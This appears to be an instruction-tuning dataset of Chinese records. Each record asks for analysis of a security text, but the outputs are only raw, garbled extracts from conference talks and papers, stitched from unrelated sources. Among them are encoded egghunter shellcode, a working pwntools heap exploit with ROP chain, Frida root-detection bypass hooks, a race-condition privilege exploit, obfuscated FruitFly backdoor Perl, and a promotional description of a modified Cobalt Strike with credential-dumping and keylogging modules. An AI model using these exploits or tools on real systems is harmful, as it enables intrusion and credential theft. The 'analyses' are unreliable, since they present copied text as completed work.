<artifactId>spring-boot-starter-test</artifactId> <scope>test</scope> </dependency> <dependency> <groupId>com.alibaba</groupId> <artifactId>druid-spring-boot-starter</artifactId> <version>1.1.1</version> </dependency> </dependencies> <build> <plugins> <plugin> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-maven-plugin</artifactId> </plugin> <plugin> <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-resources-plugin</artifactId> <version>3.1.0</version> </plugin> </plugins> </build> </project> ``` `application.prope", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFrom BUG to 0day  Busting the perimeter egghunter_wtf = ( %JMNU%521*TX-1MUU-1KUU-5QUUP\\AA%J\" \"MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5\" \"21*-q!au-q!au-oGSePAA%JMNU%521*-D\" \"A~X-D4~X-H3xTPAA%JMNU%521*-qz1E-1\" \"z1E-oRHEPAA%JMNU%521*-3s1--331--\" \"TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA\" \"A%JMNU%521*-R222-1111-nZJ2PAA%JMN\" \"U%521*-1-wD-1-wD-8$GwP ) Mati Aharoni  Offensive Security From BUG to 0day  Busting the perimeter  0wnage via 0day is l33t!  Real World Exploit Development challenges.  Live session overview of the HP NNM exploit development cycle.  The experience was so horrible I had to share it.  Lots of olly.  Find the bug .  Figuring out its a SEH.  Figuring out Alpha Numeric restrictions for first payload.  Finding an alternate short jump over RET address.  Finding a place in the buffer / memory for our second final payload.  Figuring out that an egghunter would be ideal as 1st payload.  Figuring out that we need to manually encode our shellcode. The journey begins Manual Encoding of 1st stage shellcode (egghunter)  Figuring out the allowed instruction sets.  Aligning EAX with stack location where shellcode will be decoded.  Encoding the egghunter using AND, SUB ,ADD.  Decoding the egghunter and PUSHing it onto the stack.  Running the egghunter.  Hitting our second and final payload.  Dang it, give me a shell! Limited range of allowed characters \\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x31\\x32\\x33\\x34\\x35\\x36\\x37 \\x38\\x39\\x3b\\x3c\\x3d\\x3e\\x41\\x42\\x43\\x44\\x45\\x46\\x47\\x48\\x49\\x4a \\x4b\\x4c\\x4d\\x4e\\x4f\\x50\\x51\\x52\\x53\\x54\\x55\\x56\\x57\\x58\\x59\\x5a \\x5b\\x5c\\x5d\\x5e\\x5f\\x60\\x61\\x62\\x63\\x64\\x65\\x66\\x67\\x68\\x69\\x6a \\x6b\\x6c\\x6d\\x6e\\x6f\\x70\\x71\\x72\\x73\\x74\\x75\\x76\\x77\\x78\\x79\\x7a \\x7b\\x7c\\x7d\\x7e\\x7f We cant short jump - \\xeX range not allowed. We will need to manually encode our payload :/ \\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49 \\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x51\\x5a\\x6a\\x41 \\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42 \\x30\\x4", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBug Bounty 獎金獵人甘苦談 那些年我回報過的漏洞 orange@chroot.org #Orange Tsai #CHROOT #DEVCORE #電競選手 #CTFer #Web #汪 My RCE Checklists  Facebook  Apple  Yahoo  Uber ? Google 什麼是 Bug Bounty Program ?  在官方所提供的規則及範圍下, 讓獨立的研究人員可自由尋找系 統漏洞, 並提供對等的獎勵 小禮物 獎金 名譽Hall of Fame Bug Bounty 好處? 防止漏洞流入地下市場 架構大難顧及網路邊界 企業對外形象宣傳 改善社會不良風氣 How do you turn this on ? Bug Bounty 好處? 防止漏洞流入地下市場 架構大難顧及網路邊界 企業對外形象宣傳 改善社會不良風氣 更多的駭客 更多的思路 更多的漏洞 Bug Bounty 好處? 防止漏洞流入地下市場 架構大難顧及網路邊界 企業對外形象宣傳 改善社會不良風氣 公司對於安全的重視 吸引優秀的資安高手 Bug Bounty 好處? 防止漏洞流入地下市場 架構大難顧及網路邊界 企業對外形象宣傳 改善社會不良風氣 告訴駭客們有簡單的 方法可以做好事 有哪些企業已經有了 Bug Bounty ? 1995 2010 2011 2013 2013 2016 2014 2015 The Internet Bug Bounty 為了維護網路世界的和平 獎勵那些找出可影響整個網路世界弱點的英雄們! Bug Bounty 成效 $6 Million  750+ bugs in 2015  300+ hackers in 2015 $4.2 Million  526 bugs in 2015  210 hackers in 2015 $1.6 Million  2500+ bugs since 2013  1800+ hackers since 2013 參加 Bug Bounty 前的準備 為了甚麼參加 對於尋找漏洞的心理準備 常見弱點的理解 資訊的蒐集方法 獎金 名譽 練功 參加 Bug Bounty 前的準備 為了甚麼參加 對於尋找漏洞的心理準備 常見弱點的理解 資訊的蒐集方法 雖然今非昔比 告訴自己一定會有洞 參加 Bug Bounty 前的準備 為了甚麼參加 對於尋找漏洞的心理準備 常見弱點的理解 資訊的蒐集方法 常見弱點的理解 SQL Injection Cross-Site Scripting Cross-site Request Forgery XML External Entity Local File Inclusion CSV Macro Injection XSLT Injection SVG/XML XSS RPO Gadget (NOT ROP) Subdomain Takeover 參加 Bug Bounty 前的準備 為了甚麼參加 對於尋找漏洞的心理準備 常見弱點的理解 資訊的蒐集方法 資訊的蒐集方法  DNS 與 網路邊界 子域名? 相鄰域名? 內部域名? Whois? R-Whois? 併購服務 Google 的六個月規則  Port Scanning Facebook Jenkins RCE by Dewhurst Security Pornhub Memcached Unauthenticated Access by @ZephrFish uberinternal.com ? twttr.com ? etonreve.com ? 資訊的蒐集方法 - 小案例  Yahoo! Yapache 修改版本的 Apache Web Server 在當時也是創舉 資訊的蒐集方法 - 小案例 參加 Bug Bounty 注意事項  注意規則及允許範圍  不符合規定的漏洞  撰寫報告的禮節 注意規則及允許範圍  規則所允許範圍 範圍外就無法嘗試嗎?  規則所允許限度 Instagram's Million Dollar Bug by Wesley (Awesome :P) 參加 Bug Bounty 注意事項  注意規則及允許範圍  不符合規定的漏洞  撰寫報告的禮節 不符合規定的漏洞  別踏入榮譽感的誤區  常見不符合規定例子: SELF XSS (需要過多使用者互動) Information Leakage Cookie without Secure Flag or HttpOnly Logout CSRF Content Injection 2014 Google VRP 回報狀況 參加 Bug Bounty 注意事項  注意規則及允許範圍  不符合規定的漏洞  撰寫報告的禮節", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHardw are bac kdo oring is practical Jonathan Brossard - jonathan.brossard@toucan-system.com Securit y Researc h Engineer & CEO, T oucan System, F rance and Australia Blac khat Briengs and Defcon conferences, Las V egas, 2012 T o cr e ate is to r esist, to r esist is to cr e ate National Council of the Resistance Abstract. This article will demonstrate that p ermanen t bac kdo oring of hardw are is practical. W e ha v e built a generic pro of of concept malw are for the in tel arc hitecture, Rakshasa 1 , capable of infecting more than a h undred dieren t motherb oards. The rst net eect of Rakshasa is to disable NX p ermanen tly and remo v e SMM[1  related xes from the BIOS, an Unied Extensible Firm w are In terface (UEFI)[2 [3  rm w are, or from a PCI[4 rm w are, resulting in p ermanen t lo w ering of the securit y of the bac kdo ored computer, ev en after complete earasing of hard disks and reinstallation of a new op erating system. W e shall also demonstrate that preexisting w ork on MBR sub v ertions suc h as b o otkiting and preb o ot authen tication soft w are bruteforce or faking can b e em b edded in Rakshasa with little eort. More o v er, Rakshasa is built on top of free soft w are, including the Coreb o ot[5 , Seabios[6, and iPXE[7  pro jects, meaning that most of its source co de is b oth already public and non malicious, therefore extremely hard to detect as suc h. W e shall nally demonstrate that bac kdo oring of the BIOS or PCI rm w ares to allo w the silen t b o oting a remote pa yload via an h ttp(s) connection is equally practical and ruins all hop e to detect the infection using existing to ols suc h as an tivirii or existing forensics to ols. It is hop ed to raise a w areness of the industry regarding the dangers asso ciated with the PCI standard, esp ecially question the use of non op en source rm w ares shipp ed with an y computer and question their in tegrit y or actual in tend. This shall also result in upgrading the b est practices in companie", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCONFESSIONS OF A NESPRESSO MONEY MULE NINA KOLLARS @NIANASAVAGE KITTY HEGEMON VIEW EXPRESSED TODAY DO NOT NECESSARILY REFLECT THE DON, DOD, NWC, . YES, THEY KNOW IM HERE, . .SO I BOUGHT SOME COFFEE ON EBAY And this showed up with my coffee.. Retail $280 Triangulation Fraud ..SO I BOUGHT SOME MORE COFFEE ON EBAY .AND THEN I BOUGHT MORE COFFEE ON EBAY VERY POLITE CANCELLED ORDER MAYBE YOU OUGHT TO CONTACT THE FBI.? Total bounty: Total Spent: Guilt Factor Less? TOTAL BOUNTY. 5 Total Purchases 1 Cancelled #of Pods 1200 1 Frother, 1 Espresso Machine $ Spent: 391.90 $ Value : Approx 939 ~ Not on sale. FOR SALE: GENTLY USED NESPRESSO PIXIE NO.I REALLY HAVENT THOUGHT THIS THROUGH. PROCEEDS TO DIANAINITIATIVE Bidding starts at $1.00 ..Cash only @NIANASAVAGE Come to Tamper Evident AUCTION ENDS SUNDAY @10AM THANK YOU! Nina.kollars@usnwc.edu Shout out to: Mom Dad Brother HuggyBear Funsized DataGram", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2016 Verint systems inc. All rights reserved worldwide 9  Invisible Attacks  VPN, AD, PtH, PtT  Invisible Network Traffic  Google Drive, Dropbox  Invisible Malware  Task schedule, Wmi , Powershell Low visibility of Cyber Threats  2016 Verint systems inc. All rights reserved worldwide 10  As seen from the script or fileless malware, they begin to increase dramatically. And the PowerShell can be embedded in a macro and then into a document file in various forms.  The leverage of PowerShell or wmi which both built-in in windows system are often used in post-exploitation activities so the fileless threats will be more and more. Fileless malware attacks  2016 Verint systems inc. All rights reserved worldwide 11  The following elegant PowerShell can achieve three things in one line:  Detect the architecture (check against the size of the IntPtr object type: x86 or x64bit).  Download binary from website.  Directly run the binary on the fly (use iex command).  Invoke-Expression(iex), Runs commands or expressions on the local computer. You can install the back door just in one PS line  The malicious program is Self-Signed. But hacker added it to the trusted root chain. So the victim will always verify this as valid signature. 12 Import Self-Signed Certificate to Bypass Sign Check  TMPolicy (2) .dll is pretending to be msisip.dll  F:\\MyProject\\msisip\\Release\\NvSmartMax.pdb  DLL entry points, and all exported APIs only do one thing  WinExec (\"tmpolicy.dll\", 0)  TMPolicy (1) .dll The original name is tmpolicy.dll  Actually TMPolicy (1) .dll is a PE file(tmpolicy.dll). Sample_NICT.rar Overview 15 TMPolicy Sample Overview  The malware will determine whether its in the 32-bit or 64-bit windows version and generate the different payload with dll to bypass the security check.  In Windows XP will drop srvlic.dll + fake file  In Windows 7 will drop msTracer.dll + fake file  Fake file is actually a real backdoor module and is usually dropped to :  C:\\Documents and Settings\\All Users\\Ap", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nandroid UnCrackable OWASPcrackmeapp Githubhttps://github.com/OWASP/owasp-mstg/tree/master/Crackmes : https://pan.baidu.com/s/1YCiUU2Xy2xBSUQNxric8mQ : 81kn pixel xl arm64-v8a python 3.8.0 frida 12.8.0 java 11.0.8 jadx 1.1.0 IDA 7.0 Ghidra 9.1.2 Android Level 1 UnCrackable1 javaroot jadxfrida owasp-mstg/Crackmes/Android/Level_01(master*)  adb install UnCrackable- Level1.apk Performing Streamed Install Success root root jadxapk root c.a\\c.b\\c.croot  public void onCreate(Bundle bundle) { if (c.a() || c.b() || c.c()) { a(\"Root detected!\"); } if (b.a(getApplicationContext())) { a(\"App is debuggable!\"); } super.onCreate(bundle); setContentView(R.layout.activity_main); }  rootfridahook package sg.vantagepoint.a; import android.os.Build; import java.io.File; public class c { public static boolean a() { for (String file : System.getenv(\"PATH\").split(\":\")) { if (new File(file, \"su\").exists()) { return true; } } return false; } public static boolean b() { String str = Build.TAGS; return str != null && str.contains(\"test-keys\"); } public static boolean c() { sg.vantagepoint.a.croot cabchookfalse frida for (String file : new String[]{\"/system/app/Superuser.apk\", \"/system/xbin/daemonsu\", \"/system/etc/init.d/99SuperSUDaemon\", \"/system/bin/.ext/.su\", \"/system/etc/.has_su_daemon\", \"/system/etc/.installed_su_daemon\", \"/dev/com.koushikdutta.superuser.daemon/\"}) { if (new File(file).exists()) { return true; } } return false; } } Java.perform(function () { send(\"hook start\"); var c=Java.use(\"sg.vantagepoint.a.c\"); //false c.a.overload().implementation = function(){ return false; } c.b.overload().implementation = function(){ return false; } c.c.overload().implementation = function(){ return false; } send(\"hook end\"); }); frida frida -U -f owasp.mstg.uncrackable1 --no-pause -l uncrackable1.js hookVERIFYThat's not it.Try again. jadxTry again verifya.a(obj)a 1frida hook frida uncrackable1.js frida public static boolean a(String str) { byte[] bArr; byte[] bArr2 = new byte[0]; try { bArr = sg", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNu1L StarCtf Writeup Nu1L StarCtf Writeup Pwn heap master hackme OOB babyshell girlfriend quicksort upxofcpp blind pwn Web Echohub 996 Game mywebsql Misc babyflash otaku Checkin She Sokoban homebrewEvtLoop homebrewEvtLoop# Reverse Matr1x fanoGo yy Obfuscating Macros II Crypto babyprng babyprng2 notcurves notfeal Pwn heap master Status: Completed Tags: Pwn from pwn import * LOCAL = 0 VERSBOE = 1 if VERSBOE: context.log_level = 'debug' else: context.log_level = 'critical' if LOCAL: io = process('./heap_master', env={'LD_PRELOAD': './libc.so.6'}, aslr=False) else: io = remote('34.92.96.238', 60001) def add(size): io.sendlineafter('>> ', '1') io.sendlineafter('size: ', str(size)) def edit(off, size, content): io.sendlineafter('>> ', '2') io.sendlineafter('offset: ', str(off)) io.sendlineafter('size: ', str(size)) io.sendafter('content: ', content) def delete(off): io.sendlineafter('>> ', '3') io.sendlineafter('offset: ', str(off)) edit(0xc8, 8, p64(0x101)) edit(0x1c8, 8, p64(0x31)) edit(0x1f8, 8, p64(0x31)) delete(0xd0) edit(0xd8, 2, '\\xc0\\xd7') add(0xf0) edit(0x8, 8, p64(0x1611)) edit(0x8+0x1610, 8, p64(0x31)) delete(0x10) edit(0x808, 0x10, p64(0x1611) + p64(0x00000000fbad1800)) add(0x1610-0x10) edit(0x8, 8, p64(0x1651)) edit(0x8+0x1650, 8, p64(0x31)) delete(0x10) io.recvn(0x10) leak_addr = u64(io.recvn(8)) print hex(leak_addr) libc_base = leak_addr - 0x39e683 print hex(libc_base) edit(0x8, 8, p64(0x3921)) edit(0x8+0x3920, 8, p64(0x31)) delete(0x10) payload = p64(libc_base+0x177df9) edit(0x10, len(payload), payload) add(0x3920-0x10) libc = ELF('./libc.so.6') # 0x0000000000177df9 : xchg ebp, edi ; jmp qword ptr [rdx] # 0x0000000000029933 : leave ; ret # 0x000000000001feea : pop rdi ; ret # 0x000000000001fe95 : pop rsi ; ret # 0x0000000000001b92 : pop rdx ; ret pop_rdi = libc_base+0x000000000001feea pop_rsi = libc_base+0x000000000001fe95 pop_rdx = libc_base+0x0000000000001b92 open_addr = libc_base + libc.sym['open'] read_addr = libc_base + libc.sym['read'] write_addr = li", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAttack2Defense星球专属版CobaltStrike发布 IceRiver 经过星球内佬们的不懈努星球内部专属版CobaltStrike终于开发完成我们将其命名为 IceRiverIceRiver主要基于CobaltStrike 4.4 进的次开发在修复了这个版本的些bug的 同时扩展了些功能下进详细介绍 版本特性清单 修改特征  修改默认登录认证的header标志位数据  修改beacon配置信息的默认XOR密钥  修改配置数据所在堆块的默认值  修改HTTP ua头  修改HTTP Server默认的返回信息  在兼容ForeignHTTP和ForeignHTTPS监听器前提下修改stage uri成算法 增加功能  teamserver添加双因认证  主机统计  self inject模 式:Screenshot,Hashdump,Desktop,Printscreen,ChromeDump,PassTheHash(pth),DcSyn c,LogonPasswords,NetView(net),KeyLogger,PortScan,PowerShell(powerpick)  setchar:修改返回数据编码  内置winvnc 修复漏洞  修复CVE-2022-23317  修复Range头解析bug 添加双因素认证解决CS teamserver的登录问题 最近群传CS全版本被登录绕过的漏洞 据我们分析很可能是通过mysql蜜罐读取teamserver的密码CS的客户端会将你的登录信息 保存到C:\\Users\\<user>\\.aggressor.prop件当中通过mysql蜜罐直接..\\遍历或者读取 windows的些配置件从找到系统当中户的home路径具体可参考师章http s://www.zcgonvh.com/post/tips_of_arbitrary_file_read_on_windows.html .aggressor.prop件的保存路径 client保存的配置信息当中就有teamserver的密码 如此来进内后再也不敢随便连接mysql了万蓝队搞了个mysql透明代理蜜罐那就好 玩了听说已经有被搞了 但是如何防范只需要启teamserver双因登录或者 iptables配置名单前者便点IceRiver带双因登录功能 特性说明 teamserver双因登录 teamserver端部署需要成google otp的验证码成验证码只需要打开client使GenOtp窗 即可完成成 1. 先运client端打开GenOtp窗 2. 点击generate成随机secret key可以修改account和title信息这将显示在 Authenticator APP当中 3. 复制并保存成的secret数据到opt.code件当中 4. 点击ShowScanQRCode进otp维码扫码使google的Authenticator APP扫码 将会获得与secret绑定的验证码 Authenticator显示的验证信息 5. 点击SaveQRCode可以选择保存维码到本地件当中 6. 部署teamserver时需要将第3步当中保存的otp.code件放到teamserver相同录下否则 会报错提示找不到验证件且法登录teamserver 7. 启动teamserver后在连接除了输其他信息外在AuthCode处输APP上显示的6 位验证码点击连接即可 修改stage uri成算法 当修改MSFURI成算法后会出现法快速传递会话到MSF当中的情况就是法直接使 spawn -> foreign http(s) listener传递会话这为了兼容便捷的传递会话做了些修改 可以保证在满法被扫描出stage的情况下快速传递会话到MSF当中 self inject模式 开启该模式之 后,Screenshot,Hashdump,Desktop,Printscreen,ChromeDump,pth,DcSync,LogonPasswords, net,KeyLogger,PortScan,powerpick这些beacon当中需要fork & inject的后渗透模块将会注 到beacon所在的当前进程当中可以绕过部分杀软对注的拦截使法与之前的 Attack2DefenseAgent相同不再赘述 内置winvnc 不再需要在teamserver端创建third-party录并上传winvnc dll已经集成进jar包当中 Range头解析bug 外研究发现的个teamserver的特征修复完成 修改HTTP Server默认的返回信息 外研究发现的个teamserver的特征修复完成 参考资料  https://www.mds", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH \"SHOW\" \"7\" \"2003-11-02\" \"SQL - Language Statements\" \"SQL Commands\" .SH NAME SHOW \\- 显示运行时参数的数值 .SH SYNOPSIS .sp .nf SHOW \\fIname\\fR SHOW ALL .sp .fi .SH \"DESCRIPTION 描述\" .PP \\fBSHOW\\fR 将显示当前运行时参数的数值 这些变量可以通过 SET 语句来设置或者通过编辑 postgresql.conf 或者通过 PGOPTIONS 环境变量在使用libpq或者以 libpq 为基础的应用的时候 或者在postmaster启动时用命令行参数来设置 参阅 Section 16.4 ``Run-time Configuration'' 获取细节 .SH \"PARAMETERS 参数\" .TP \\fB\\fIname\\fB\\fR 运行时参数的名称可用的参数在 Section 16.4 ``Run-time Configuration'' 里面有文档以及 SET [\\fBset\\fR(7)] 手册页 另外还有几个参数可以显示但是不能设置 .RS .TP \\fBSERVER_VERSION\\fR 显示服务器的版本号 .TP \\fBSERVER_ENCODING\\fR 显示服务器断的字符集编码目前这个参数只能显示但不能设置 因为编码是在创建数据库的时候决定的 .TP \\fBLC_COLLATE\\fR 显示数据库的字符集区域设置字符顺序目前这个参数只能显示 但不能设置因为设置是在 initdb 的时候设置的 .TP \\fBLC_CTYPE\\fR 为字符集分类显示数据库的区域设置目前这个参数只能显示不能设置 因为它的设置是在 initdb 的时候决定的 .TP \\fBIS_SUPERUSER\\fR 如果当前事务认证标识符有超级用户权限则为真 .RE .PP .TP \\fBALL\\fR 显示所有当前会话参数 .SH \"NOTES\" .PP 函数 current_setting 生成相同输出 参阅 Section 9.13 ``Miscellaneous Functions''  .SH \"EXAMPLES 例子\" .PP 显示当前 DateStyle 的设置 .sp .nf SHOW DateStyle; DateStyle ----------- ISO, MDY (1 row) .sp .fi .PP 显示参数geqo的当前设置 .sp .nf SHOW geqo; geqo ------ on (1 row) .sp .fi .PP 显示所有设置 .sp .nf SHOW ALL; name | setting -------------------------------+--------------------------------------- australian_timezones | off authentication_timeout | 60 checkpoint_segments | 3 . . . wal_debug | 0 wal_sync_method | fdatasync (94 rows) .sp .fi .SH \"COMPATIBILITY 兼容性\" .PP SHOW 命令是 PostgreSQL 扩展 .SH \"SEE ALSO\" SET [\\fBset\\fR(7)] .SH \"译者\" .B Postgresql 中文网站 .B 何伟平 <laser@pgsqldb.org>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Level10 #### About The setuid binary at /home/flag10/flag10 binary will upload any file given, as long as it meets the requirements of the access() system call. To do this level, log in as the level10 account with the password level10. Files for this level can be found in /home/flag10. #### Source code ``` #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <stdio.h> #include <fcntl.h> #include <errno.h> #include <sys/socket.h> #include <netinet/in.h> #include <string.h> int main(int argc, char **argv) { char *file; char *host; if(argc < 3) { printf(\"%s file host\\n\\tsends file to host if you have access to it\\n\", argv[0]); exit(1); } file = argv[1]; host = argv[2]; if(access(argv[1], R_OK) == 0) { int fd; int ffd; int rc; struct sockaddr_in sin; char buffer[4096]; printf(\"Connecting to %s:18211 .. \", host); fflush(stdout); fd = socket(AF_INET, SOCK_STREAM, 0); memset(&sin, 0, sizeof(struct sockaddr_in)); sin.sin_family = AF_INET; sin.sin_addr.s_addr = inet_addr(host); sin.sin_port = htons(18211); if(connect(fd, (void *)&sin, sizeof(struct sockaddr_in)) == -1) { printf(\"Unable to connect to host %s\\n\", host); exit(EXIT_FAILURE); } #define HITHERE \".oO Oo.\\n\" if(write(fd, HITHERE, strlen(HITHERE)) == -1) { printf(\"Unable to write banner to host %s\\n\", host); exit(EXIT_FAILURE); } #undef HITHERE printf(\"Connected!\\nSending file .. \"); fflush(stdout); ffd = open(file, O_RDONLY); if(ffd == -1) { printf(\"Damn. Unable to open file\\n\"); exit(EXIT_FAILURE); } rc = read(ffd, buffer, sizeof(buffer)); if(rc == -1) { printf(\"Unable to read from file: %s\\n\", strerror(errno)); exit(EXIT_FAILURE); } write(fd, buffer, rc); printf(\"wrote file!\\n\"); } else { printf(\"You don't have access to %s\\n\", file); } } ``` #### solutions ``` echo aaaaaaaa>/tmp/token nc -kl 18211 ``` * ---- /tmp/create_link.sh ---- ``` #!/bin/bash while true do ln -fs /tmp/token /tmp/lv10_token ln -fs /home/flag10/token /tmp/lv10_token done ``` * ----/tmp/connect.sh ---- ``` #!/bin/bash whil", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMarina Krotofil, Jason Larsen DefCon 23, Las Vegas, USA 07.08.2015 Rocking the Pocket Book: Hacking Chemical Plants for Competition and Extortion Who we are Hacker (Ex)Academic Got hooked on cyber- physical hacking Dragged into academic world against own will Motivation Industrial Control Systems Industrial Control Systems aka SCADA Physical application Curtesy: Compass Security Germany GmbH Industry means big business Big business == $$$$$$$ Industrial Control Systems Some horrible physical consequences 010011011011101 Missing piece of knowledge How do we do it?? Source: simentari.com Typical understanding of SCADA hacking What can be done to the process Compliance violation  Safety (occupational, environment)  Pollution (environment)  Contractual agreements Production damage  Product quality and product rate  Operating costs  Maintenance efforts Equipment damage  Equipment overstress  Violation of safety limits Attack considerations  Equipment damage o Comes first into anybodys mind (+) o Irreversible ( ) o Unclear collateral damage (-) o May transform into compliance violation, e.g. if it kills human (-) Compliance violation Production damage Equipment damage  Compliance violation o Compliance regulations are public knowledge (+) o Unclear collateral damage (-) o Must be reported to the authorities ( ) o Will be investigated by the responsible agencies (-)   Heres a plant. What is the plan? Attack goal: persistent economic damage Process control Running upstairs to turn on your furnace every time it gets cold gets tiring after a while so you automate it with a thermostat (Nest because its so cute!) Process control automation Set point Control loop Actuators Control system Physical process Sensors Measure process state Computes control commands for actuators Adjust themselves to influence process behavior Control system Jacques Smuts Process Control for Practitioners Termostat controller + Error in desired temperature e(t) = SP - PV Heat loss (e.g. through windows", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n@patrickwardle OFFENSIVE MALWARE ANALYSIS dissecting osx/fruitfly via a custom c&c server WHOIS leverages the best combination of humans and technology to discover security vulnerabilities in our customers web apps, mobile apps, IoT devices and infrastructure endpoints security for the 21st century @patrickwardle OUTLINE fruitfly monitoring c&c server tasking trapping flies analyze OSX/FruitFly.B ...'smartly' THE GOAL command description 0 ? 1 ? 2 \"take screen shot\" \"execute command #2\" malware's commands build: custom C&C server spy.com steal (borrow?) other ppls access 1 task: the malware observe: the response 2 3 cmd #2 domain hijack OSX/FRUITFLY an intriguing backdoor initially discovered by malwarebytes OSX/FRUITFLY ('QUIMITCHIN') \"New Mac backdoor using antiquated code\" -malwarebytes/thomas reed components (script, binary, etc) persistence (launch agent) capabilities } Virus Total submission(s) Jan 11th (0 detections) files procs cam mouse keys infection vector? trojan? email? web popup? variant b OSX/FRUITFLY.B $ file fpsaud perl script text executable, ASCII text $ cat fpsaud #!/usr/bin/perl use strict;use warnings;use IO::Socket;use IPC::Open2;my$l;sub G{die if!defined syswrite$l,$_[0]}sub J{my($U, $A)=('','');while($_[0]>length$U){die if! sysread$l,$A,$_[0]-length$U;$U.=$A;}return$U;} sub O{unpack'V',J 4}sub N{J O}sub H{my$U=N; $U=~s/\\\\/\\//g;$U}sub I{my$U=eval{my$C=`$_[0]`;chomp$C;$C};$U=''if! defined$U;$U;}sub K{$_[0]?v1:v0}sub Y{pack'V', $_[0]}sub B{pack'V2',$_[0]/2**32,$_[0]%2**32} sub Z{pack'V/a*',$_[0]}sub M{$_[0](v3 x length($_[0]))}my($h,@r)=split/ a/,M('11b36-301-;;2-45bdql-lwslk-hgjfbdql- pmgh`vg-hgjf');push@r,splice@r, 0,rand@r;my@e=();for my$B (split/ a/,M('1fg7kkb1nnhokb71jrmkb;rm`;kb1fplifeb1njg ule')){push@e,map $_.$B,split/a/,M(dql-lwslk- bdql-pmgh`vg-');}push@e,splice@e,0,rand@e; ... obfuscated perl?! } name: 'fpsaud' OSX/FruitFly.B submitted: 1/31 (0 AV detections) type: perl script mahalo @noarfromspace a brief triage OSX/FRUITFLY.B 'tell", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nversion: '2' services: redis: image: redis ports: - 6379:6379 celery: image: vulhub/celery:3.1.23 volumes: - .:/home/user command: \"celery -A tasks worker -l debug\" links: - redis environment: CELERY_BROKER_URL: redis://redis/0", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 守护进程 --- Linux 服务器在启动时需要启动很多系统服务它们向本地和网络用户提供了 Linux 的系统功能接口直接面向应用程序和用户提供这些服务的程序是由运行在后台的守护进程来执行的守护进程是生存期长的一种进程它们独立于控制终端并且周期性的执行某种任务或等待处理某些发生的事件他们常常在系统引导装入时启动在系统关闭时终止linux 系统有很多守护进程大多数服务器都是用守护进程实现的同时守护进程完成许多系统任务比如作 业规划进程 crond打印进程 lqd 等有些书籍和资料也把守护进程称作服务 守护进程也就是指 daemon 和 service --- ## 守护进程的分类 根据守护进程的启动和管理方式可以分为独立启动守护进程和超级守护进程两类 - 独立启动(stand_alone): 该类进程启动后就常驻内存所以会一直占用系统资源其最大的优点就是它会一直启动当外界有要求时相应速度较快像 httpd 等进程 - 超级守护进程系统启动时由一个统一的守护进程 xinet 来负责管理一些进程当相应请求到来时需要通过 xinet 的转接才可以唤醒被 xinet 管理的进程这种进程的优点时最初只有 xinet 这一守护进程占有系统资源其他的内部服务并不一直占有系统资源只有数据包到来时才会被 xinet 管理员来唤醒并且我们还可以通过 xinet 来对它所管理的进程设置一些访问权限相当于多了一层管理机制 如果用两个比喻来形容两类守护进程的话一般会用银行的业务处理窗口来类比 - 独立启动银行里有一种单服务的窗口像取钱存钱等窗口这些窗口边上始终会坐着一个人如果有人来取钱或存钱可以直接到相应的窗口去办理这个处理单一服务的始终存在的人就是独立启动的守护进程 - 超级守护进程银行里还有一种窗口提供综合服务像汇款转账提款等业务这种窗口附近也始终坐着一个人xinet她可能不提供具体的服务提供具体服务的人在里面闲着聊天啊喝茶啊但是当有人来汇款时他会大声喊一句小王有人汇款啦然后里面管汇款的小王会立马跑过来帮忙办完汇款业务其他的人继续聊天喝茶这些负责具体业务的人我们就称之为超级守护进程当然可能汇款人会有一些规则可能不能往北京汇款他就会提早告诉 xinet所以如果有人来汇款想汇往北京的话管理员就直接告诉他这个我们这里办不到的于是就根本不会去喊汇款员了相当于提供了一层管理机制针对这种窗口还存在多线程和单线程的区别 - 多线程将所有用户的要求都提上来里面的人都别闲着了都一起干活吧 - 单线程大家都排好队了一个一个来里面的人同一时间只有一个人在工作 这里需要注意的是超级守护进程的管理员 xinet 也是一个守护进程只不过它的任务就是传话 当然每个守护进程都会监听一个端口银行窗口一些常用守护进程的监听端口是固定的像 httpd 监听 80 端口 sshd 监听 22 端口等我们可以将其理解为责任制时候等待有求必应具体的端口信息可以通过 `cat /etc/services` 来查看 --- ## Service 命令 Linux 的 service 命令就是查看和控制所有的独立启动的守护进程 这个命令不是在所有的 linux 发行版本中都有主要是在 redhat 系 linux 